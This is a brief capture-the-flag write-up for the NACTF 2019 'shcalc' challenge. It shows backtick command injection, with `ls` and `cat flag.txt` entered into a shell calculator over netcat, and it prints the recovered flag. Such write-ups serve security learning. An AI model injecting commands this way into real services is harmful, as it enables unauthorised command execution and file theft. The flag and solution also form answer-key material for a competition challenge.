Tags: nactf shcalc
Rating:
This is code injection. So we will inject code like this:
> $ nc shell.2019.nactf.com 31214
> shcalc v1.1
> > `ls`
> sh: 1: arithmetic expression: expecting EOF: "calc.sh
> flag.txt"
> > `cat flag.txt`
> sh: 1: arithmetic expression: expecting EOF: "nactf{3v4l_1s_3v1l_dCf80yOo}"
> >
Flag
**nactf{3v4l_1s_3v1l_dCf80yOo}
**
ressource : https://ctf101.org/web-exploitation/command-injection/what-is-command-injection/